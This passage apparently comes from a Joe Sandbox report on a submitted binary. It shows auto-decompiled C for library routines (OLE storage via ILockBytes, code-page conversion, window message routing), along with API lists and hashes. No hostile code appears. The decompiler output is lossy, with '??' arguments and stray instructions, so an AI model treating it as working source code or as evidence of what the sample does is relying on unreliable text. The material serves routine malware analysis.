									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x44df1c, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								E0042B152(_t228 - 0x74, _t214);
								 *(_t228 - 4) = 0;
								E004230C5(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E0042B10D(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x44df2c);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}










































                                                                              0x0040cc52
                                                                              0x0040cc62
                                                                              0x0040cc73
                                                                              0x0040cc76
                                                                              0x0040cc7d
                                                                              0x0040cc80
                                                                              0x0040cf54
                                                                              0x0040cf5a
                                                                              0x0040cf62
                                                                              0x0040cf62
                                                                              0x0040cc8c
                                                                              0x0040cc8f
                                                                              0x0040cc92
                                                                              0x0040cc95
                                                                              0x0040cc9e
                                                                              0x0040cca6
                                                                              0x0040cca9
                                                                              0x0040ccdc
                                                                              0x0040ccdc
                                                                              0x0040cce1
                                                                              0x0040cd46
                                                                              0x0040cd49
                                                                              0x0040cdb5
                                                                              0x0040cdb5
                                                                              0x0040cdb9
                                                                              0x0040cdc3
                                                                              0x0040cdc5
                                                                              0x0040cdc7
                                                                              0x0040cf16
                                                                              0x0040cf19
                                                                              0x0040cf33
                                                                              0x0040cf33
                                                                              0x0040cf38
                                                                              0x0040cf3d
                                                                              0x0040cf3d
                                                                              0x0040cf43
                                                                              0x0040cf4a
                                                                              0x0040cf4a
                                                                              0x0040cf51
                                                                              0x00000000
                                                                              0x0040cf51
                                                                              0x0040cf1b
                                                                              0x0040cf1b
                                                                              0x0040cf1f
                                                                              0x0040cf26
                                                                              0x0040cf29
                                                                              0x0040cf2e
                                                                              0x0040cf31
                                                                              0x0040cf31
                                                                              0x00000000
                                                                              0x0040cf1f
                                                                              0x0040cdcd
                                                                              0x0040cdcf
                                                                              0x0040ce2f
                                                                              0x0040ce32
                                                                              0x0040cee1
                                                                              0x0040cee8
                                                                              0x0040cee8
                                                                              0x0040ceeb
                                                                              0x0040ceee
                                                                              0x0040cef1
                                                                              0x0040cef4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cef9
                                                                              0x0040cefb
                                                                              0x0040cf02
                                                                              0x0040cf04
                                                                              0x0040cf13
                                                                              0x0040cf13
                                                                              0x0040cf02
                                                                              0x00000000
                                                                              0x0040cef9
                                                                              0x0040ce3c
                                                                              0x0040ce3f
                                                                              0x0040ce41
                                                                              0x0040ce44
                                                                              0x0040ce7d
                                                                              0x0040ce7d
                                                                              0x0040ce84
                                                                              0x0040ce87
                                                                              0x0040ce87
                                                                              0x0040ce8a
                                                                              0x0040ce8d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce8f
                                                                              0x0040ce98
                                                                              0x0040ce9e
                                                                              0x0040cea0
                                                                              0x0040cea3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cea5
                                                                              0x0040ceb1
                                                                              0x0040ceb4
                                                                              0x0040ceba
                                                                              0x0040cebc
                                                                              0x0040cebf
                                                                              0x0040cec1
                                                                              0x0040cecd
                                                                              0x0040ced0
                                                                              0x0040ced6
                                                                              0x0040ced6
                                                                              0x0040ced9
                                                                              0x0040ce24
                                                                              0x0040ce27
                                                                              0x00000000
                                                                              0x0040ce27
                                                                              0x0040ce46
                                                                              0x0040ce4d
                                                                              0x0040ce4f
                                                                              0x0040ce55
                                                                              0x0040ce57
                                                                              0x0040ce5a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce5d
                                                                              0x0040ce63
                                                                              0x0040ce65
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce6f
                                                                              0x0040ce75
                                                                              0x00000000
                                                                              0x0040ce75
                                                                              0x0040ce48
                                                                              0x0040ce4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ce4b
                                                                              0x0040cdd1
                                                                              0x0040cdd8
                                                                              0x0040cddb
                                                                              0x0040cde1
                                                                              0x0040cde3
                                                                              0x0040cde6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cdec
                                                                              0x0040cdf9
                                                                              0x0040cdfc
                                                                              0x0040ce02
                                                                              0x0040ce04
                                                                              0x0040ce07
                                                                              0x0040ce09
                                                                              0x0040ce15
                                                                              0x0040ce18
                                                                              0x0040ce1e
                                                                              0x0040ce1e
                                                                              0x0040ce21
                                                                              0x00000000
                                                                              0x0040ce21
                                                                              0x0040cd4b
                                                                              0x0040cd4b
                                                                              0x0040cd4f
                                                                              0x0040cd59
                                                                              0x0040cd5b
                                                                              0x0040cd5d
                                                                              0x00000000
                                                                              0x0040cd5f
                                                                              0x0040cd5f
                                                                              0x0040cd61
                                                                              0x0040cd7d
                                                                              0x0040cd89
                                                                              0x0040cd8c
                                                                              0x0040cd91
                                                                              0x0040cd9b
                                                                              0x0040cd9e
                                                                              0x0040cd9e
                                                                              0x0040cd9e
                                                                              0x0040cda5
                                                                              0x0040cda8
                                                                              0x0040cd63
                                                                              0x0040cd63
                                                                              0x0040cd6c
                                                                              0x0040cd6c
                                                                              0x0040cdad
                                                                              0x00000000
                                                                              0x0040cdad
                                                                              0x0040cd5d
                                                                              0x0040cce6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ccec
                                                                              0x0040ccf3
                                                                              0x0040ccf4
                                                                              0x0040ccf9
                                                                              0x0040ccfe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040cd02
                                                                              0x0040cd03
                                                                              0x0040cd04
                                                                              0x0040cd05
                                                                              0x0040cd0e
                                                                              0x00000000
                                                                              0x0040cd10
                                                                              0x0040cd1f
                                                                              0x0040cd22
                                                                              0x0040cd25
                                                                              0x0040cd32
                                                                              0x0040cd35
                                                                              0x0040cd3b
                                                                              0x0040cd3e
                                                                              0x00000000
                                                                              0x0040cd3e
                                                                              0x0040cd0e
                                                                              0x0040ccab
                                                                              0x0040ccaf
                                                                              0x0040ccb6
                                                                              0x0040ccbd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040ccc2
                                                                              0x0040ccce
                                                                              0x0040ccd3
                                                                              0x0040ccd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040CC52
                                                                                • Part of subcall function 0040B655: CoGetClassObject.OLE32(?,?,00000000,0044DE4C,?), ref: 0040B675
                                                                                • Part of subcall function 0042B152: __EH_prolog.LIBCMT ref: 0042B157
                                                                                • Part of subcall function 0042B10D: __EH_prolog.LIBCMT ref: 0042B112
                                                                              • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0040CDDB
                                                                              • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0040CDFC
                                                                              • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0040CE4F
                                                                              • GlobalLock.KERNEL32 ref: 0040CE5D
                                                                              • GlobalUnlock.KERNEL32(?), ref: 0040CE75
                                                                              • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040CE98
                                                                              • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 0040CEB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                              • String ID:
                                                                              • API String ID: 645133905-0
                                                                              • Opcode ID: 0cb11e2dc964bcfe29984320b008dcfb3e5dfb18119a45be6a041223be77d770
                                                                              • Instruction ID: 70cfa65dd7f3a786f9eb9bacd01d9dc5c19ce028ea4dd66370c0f79e5c229cc7
                                                                              • Opcode Fuzzy Hash: 0cb11e2dc964bcfe29984320b008dcfb3e5dfb18119a45be6a041223be77d770
                                                                              • Instruction Fuzzy Hash: EEC12D70900209EFCF14DF55C988DAEBBB9FF89704B20466AF811EB290D775D941CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041AF17, Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0041AF17(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				int _t96;
				void* _t98;
				short* _t99;

				_push(0x38);
				_push(0x44cc78);
				E00412BA4(__ebx, __edi, __esi);
				_t54 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t98 - 0x1c)) = _t54;
				 *(_t98 - 0x34) = 0;
				 *(_t98 - 0x44) = 0;
				_t81 =  *( *(_t98 + 0x14));
				 *(_t98 - 0x40) = _t81;
				 *(_t98 - 0x3c) = 0;
				_t56 =  *(_t98 + 8);
				if(_t56 ==  *(_t98 + 0xc)) {
					_t82 =  *(_t98 - 0x48);
					goto L31;
				} else {
					_t85 = _t98 - 0x30;
					if(GetCPInfo(_t56, _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1 && GetCPInfo( *(_t98 + 0xc), _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1) {
						 *(_t98 - 0x3c) = 1;
					}
					if( *(_t98 - 0x3c) == 0) {
						_t96 =  *(_t98 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E00411A30( *(_t98 + 0x10));
							_pop(_t85);
							_t96 = _t77 + 1;
							__eflags = _t96;
						} else {
							_t96 = _t81;
						}
						 *(_t98 - 0x38) = _t96;
					}
					if( *(_t98 - 0x3c) != 0) {
						L14:
						 *(_t98 - 4) = 0;
						E00412260(_t96 + _t96 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t98 - 0x18) = _t99;
						_t82 = _t99;
						 *(_t98 - 0x48) = _t82;
						E00412140(_t82, 0, _t96 + _t96);
						 *(_t98 - 4) =  *(_t98 - 4) | 0xffffffff;
						_t112 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10),  *(_t98 - 0x40), _t82, _t96);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t98 - 0x44);
								if( *(_t98 - 0x44) != 0) {
									_push(_t82);
									E00412A4D();
								}
								_t57 =  *(_t98 - 0x34);
								goto L34;
							}
							__eflags =  *(_t98 + 0x18);
							if( *(_t98 + 0x18) == 0) {
								__eflags =  *(_t98 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t96);
									_push(1);
									_t69 = E004146EA(_t82, 0, _t96, __eflags);
									 *(_t98 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, _t69, _t96, 0, 0);
										__eflags = _t70;
										if(_t70 != 0) {
											__eflags =  *(_t98 - 0x40) - 0xffffffff;
											if( *(_t98 - 0x40) != 0xffffffff) {
												 *( *(_t98 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t98 - 0x34));
											E00412A4D();
											 *(_t98 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t96 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, 0, 0, 0, 0);
								__eflags = _t96;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96,  *(_t98 + 0x18),  *(_t98 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t98 - 0x34) =  *(_t98 + 0x18);
							}
							goto L31;
						} else {
							_push(_t96);
							_push(2);
							_t82 = E004146EA(_t82, 0, _t96, _t112);
							if(_t82 != 0) {
								 *(_t98 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t96 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10), _t81, 0, 0);
						 *(_t98 - 0x38) = _t96;
						if(_t96 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E00412BDF(E00412FBB(_t57,  *((intOrPtr*)(_t98 - 0x1c))));
						}
						goto L14;
					}
				}
			}
















                                                                              0x0041af17
                                                                              0x0041af19
                                                                              0x0041af1e
                                                                              0x0041af23
                                                                              0x0041af28
                                                                              0x0041af2d
                                                                              0x0041af30
                                                                              0x0041af36
                                                                              0x0041af38
                                                                              0x0041af3b
                                                                              0x0041af3e
                                                                              0x0041af44
                                                                              0x0041b0bd
                                                                              0x00000000
                                                                              0x0041af4a
                                                                              0x0041af4a
                                                                              0x0041af59
                                                                              0x0041af74
                                                                              0x0041af74
                                                                              0x0041af7e
                                                                              0x0041af9a
                                                                              0x0041af80
                                                                              0x0041af83
                                                                              0x0041af8c
                                                                              0x0041af91
                                                                              0x0041af94
                                                                              0x0041af94
                                                                              0x0041af85
                                                                              0x0041af85
                                                                              0x0041af85
                                                                              0x0041af95
                                                                              0x0041af95
                                                                              0x0041afa0
                                                                              0x0041afbc
                                                                              0x0041afbc
                                                                              0x0041afc8
                                                                              0x0041afcd
                                                                              0x0041afd0
                                                                              0x0041afd2
                                                                              0x0041afdb
                                                                              0x0041afe3
                                                                              0x0041b000
                                                                              0x0041b002
                                                                              0x0041b022
                                                                              0x0041b02f
                                                                              0x0041b035
                                                                              0x0041b037
                                                                              0x0041b0c0
                                                                              0x0041b0c0
                                                                              0x0041b0c3
                                                                              0x0041b0c5
                                                                              0x0041b0c6
                                                                              0x0041b0cb
                                                                              0x0041b0cc
                                                                              0x00000000
                                                                              0x0041b0cc
                                                                              0x0041b03d
                                                                              0x0041b040
                                                                              0x0041b062
                                                                              0x0041b065
                                                                              0x0041b07d
                                                                              0x0041b07d
                                                                              0x0041b07e
                                                                              0x0041b080
                                                                              0x0041b087
                                                                              0x0041b08a
                                                                              0x0041b08c
                                                                              0x0041b098
                                                                              0x0041b09e
                                                                              0x0041b0a0
                                                                              0x0041b0b0
                                                                              0x0041b0b4
                                                                              0x0041b0b9
                                                                              0x0041b0b9
                                                                              0x0041b0a2
                                                                              0x0041b0a2
                                                                              0x0041b0a5
                                                                              0x0041b0ab
                                                                              0x0041b0ab
                                                                              0x0041b0a0
                                                                              0x00000000
                                                                              0x0041b08c
                                                                              0x0041b077
                                                                              0x0041b079
                                                                              0x0041b07b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041b07b
                                                                              0x0041b050
                                                                              0x0041b056
                                                                              0x0041b058
                                                                              0x0041b05d
                                                                              0x0041b05d
                                                                              0x00000000
                                                                              0x0041b004
                                                                              0x0041b004
                                                                              0x0041b005
                                                                              0x0041b00e
                                                                              0x0041b012
                                                                              0x0041b01b
                                                                              0x00000000
                                                                              0x0041b01b
                                                                              0x00000000
                                                                              0x0041b012
                                                                              0x0041afa2
                                                                              0x0041afb3
                                                                              0x0041afb5
                                                                              0x0041afba
                                                                              0x0041b014
                                                                              0x0041b014
                                                                              0x0041b0cf
                                                                              0x0041b0df
                                                                              0x0041b0df
                                                                              0x00000000
                                                                              0x0041afba
                                                                              0x0041afa0

                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(00000000,?,0044CC78,00000038,00419A97,?,00000000,00000000,004138C3,00000000,00000000,0044C670,0000001C,004135F2,00000001,00000020), ref: 0041AF55
                                                                              • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041AF68
                                                                              • _strlen.LIBCMT ref: 0041AF8C
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,004138C3,?,00000000,00000000), ref: 0041AFAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Info$ByteCharMultiWide_strlen
                                                                              • String ID:
                                                                              • API String ID: 1335377746-0
                                                                              • Opcode ID: 31ddef11cf9d9292a321600743ccbdb7746488735481481bba84cbe39776b2c8
                                                                              • Instruction ID: 0ef00c97e67e07c099ff586f2ba3668a329117b7da0114417dcf0c045367667d
                                                                              • Opcode Fuzzy Hash: 31ddef11cf9d9292a321600743ccbdb7746488735481481bba84cbe39776b2c8
                                                                              • Instruction Fuzzy Hash: EA517B71801218EBCF21DF95ED849EFBFB8EF49354F24011AF825A2260D7758D91CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B32A, Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E0042B32A(void* __ebx, void* __ecx, void* __edi) {
				int _t24;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				struct HWND__* _t32;
				long _t33;
				struct HWND__* _t34;
				void* _t35;
				struct HWND__* _t36;
				struct HWND__* _t37;
				void* _t39;
				void* _t42;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t55;
				struct HWND__* _t56;
				struct HWND__* _t58;
				struct HWND__* _t59;
				void* _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr _t63;
				void* _t67;
				void* _t70;

				_t55 = __edi;
				_t42 = __ebx;
				E004128A0(E004313D6, _t67);
				_push(__ecx);
				_push(__ecx);
				_t47 = E00424440(0x10);
				 *((intOrPtr*)(_t67 - 0x14)) = _t47;
				_t24 = 0;
				 *(_t67 - 4) = 0;
				if(_t47 != 0) {
					_push( *((intOrPtr*)(_t67 + 0xc)));
					_push( *((intOrPtr*)(_t67 + 8)));
					_t24 = E004117D2(_t47);
				}
				 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t67 - 0x10)) = _t24;
				E004128BF(_t67 - 0x10, 0x452cbc);
				asm("int3");
				_t27 =  *((intOrPtr*)(_t47 + 0x74));
				if(_t27 == 0) {
					_t61 = E00408116();
					_t30 =  *((intOrPtr*)( *_t61 + 0x120))();
					_t49 = _t61;
					_t62 = _t60;
					if(_t30 != 0) {
						_push(_t62);
						_t63 = _t49;
						_t31 =  *((intOrPtr*)(_t63 + 0x60));
						if(_t31 == 0) {
							_t49 = _t63;
							_pop(_t62);
							goto L9;
						} else {
							if(_t31 != 0x3f107) {
								_t39 = E0042D179();
								_t31 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xac))( *((intOrPtr*)(_t63 + 0x60)), 1);
							}
							return _t31;
						}
					} else {
						L9:
						_push(_t49);
						_push(_t42);
						_push(_t67);
						_push(_t62);
						_push(_t55);
						 *((intOrPtr*)(_t70 + 0x10)) = _t49;
						_t32 = GetCapture();
						while(1) {
							_t56 = _t32;
							if(_t56 == 0) {
								break;
							}
							_t33 = SendMessageA(_t56, 0x365, 0, 0);
							if(_t33 == 0) {
								_t32 = E00427083(_t56);
								continue;
							}
							L25:
							return _t33;
							goto L31;
						}
						_t34 = GetFocus();
						while(1) {
							_t58 = _t34;
							if(_t58 == 0) {
								break;
							}
							_t33 = SendMessageA(_t58, 0x365, 0, 0);
							if(_t33 == 0) {
								_t34 = E00427083(_t58);
								continue;
							}
							goto L25;
						}
						_t35 = E004270C8( *((intOrPtr*)(_t70 + 0x10)));
						if(_t35 != 0) {
							_t36 =  *(_t35 + 0x1c);
						} else {
							_t36 = 0;
						}
						_t37 = GetLastActivePopup(_t36);
						while(1) {
							_t59 = _t37;
							_push(0);
							if(_t59 == 0) {
								break;
							}
							_t33 = SendMessageA(_t59, 0x365, 0, ??);
							if(_t33 == 0) {
								_t37 = E00427083(_t59);
								continue;
							}
							goto L25;
						}
						_t33 = SendMessageA( *( *((intOrPtr*)(_t70 + 0x14)) + 0x1c), 0x111, 0xe147, ??);
						goto L25;
					}
				} else {
					if(_t27 != 0x3f107) {
						return  *((intOrPtr*)( *_t47 + 0xac))(_t27, 1);
					}
					return _t27;
				}
				L31:
			}



























                                                                              0x0042b32a
                                                                              0x0042b32a
                                                                              0x0042b32f
                                                                              0x0042b334
                                                                              0x0042b335
                                                                              0x0042b33e
                                                                              0x0042b340
                                                                              0x0042b343
                                                                              0x0042b347
                                                                              0x0042b34a
                                                                              0x0042b34c
                                                                              0x0042b34f
                                                                              0x0042b352
                                                                              0x0042b352
                                                                              0x0042b357
                                                                              0x0042b35b
                                                                              0x0042b367
                                                                              0x0042b36c
                                                                              0x0042b36d
                                                                              0x0042b372
                                                                              0x0042b38d
                                                                              0x0042b393
                                                                              0x0042b39b
                                                                              0x0042b39d
                                                                              0x0042b39e
                                                                              0x0042b92b
                                                                              0x0042b92c
                                                                              0x0042b92e
                                                                              0x0042b933
                                                                              0x0042b955
                                                                              0x0042b957
                                                                              0x00000000
                                                                              0x0042b935
                                                                              0x0042b93a
                                                                              0x0042b93c
                                                                              0x0042b94d
                                                                              0x0042b94d
                                                                              0x0042b954
                                                                              0x0042b954
                                                                              0x0042b3a0
                                                                              0x0042b88d
                                                                              0x0042b88d
                                                                              0x0042b88e
                                                                              0x0042b88f
                                                                              0x0042b890
                                                                              0x0042b891
                                                                              0x0042b892
                                                                              0x0042b896
                                                                              0x0042b8bb
                                                                              0x0042b8bb
                                                                              0x0042b8bf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8af
                                                                              0x0042b8b3
                                                                              0x0042b8b6
                                                                              0x00000000
                                                                              0x0042b8b6
                                                                              0x0042b925
                                                                              0x0042b92a
                                                                              0x00000000
                                                                              0x0042b92a
                                                                              0x0042b8c1
                                                                              0x0042b8d9
                                                                              0x0042b8d9
                                                                              0x0042b8dd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8cd
                                                                              0x0042b8d1
                                                                              0x0042b8d4
                                                                              0x00000000
                                                                              0x0042b8d4
                                                                              0x00000000
                                                                              0x0042b8d1
                                                                              0x0042b8e3
                                                                              0x0042b8ea
                                                                              0x0042b8f0
                                                                              0x0042b8ec
                                                                              0x0042b8ec
                                                                              0x0042b8ec
                                                                              0x0042b8f4
                                                                              0x0042b90b
                                                                              0x0042b90b
                                                                              0x0042b90f
                                                                              0x0042b910
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8ff
                                                                              0x0042b903
                                                                              0x0042b906
                                                                              0x00000000
                                                                              0x0042b906
                                                                              0x00000000
                                                                              0x0042b903
                                                                              0x0042b923
                                                                              0x00000000
                                                                              0x0042b923
                                                                              0x0042b374
                                                                              0x0042b379
                                                                              0x00000000
                                                                              0x0042b380
                                                                              0x0042b386
                                                                              0x0042b386
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042B32F
                                                                                • Part of subcall function 004117D2: __EH_prolog.LIBCMT ref: 004117D7
                                                                              • GetCapture.USER32 ref: 0042B896
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8AF
                                                                              • GetFocus.USER32 ref: 0042B8C1
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8CD
                                                                              • GetLastActivePopup.USER32(?), ref: 0042B8F4
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8FF
                                                                              • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042B923
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
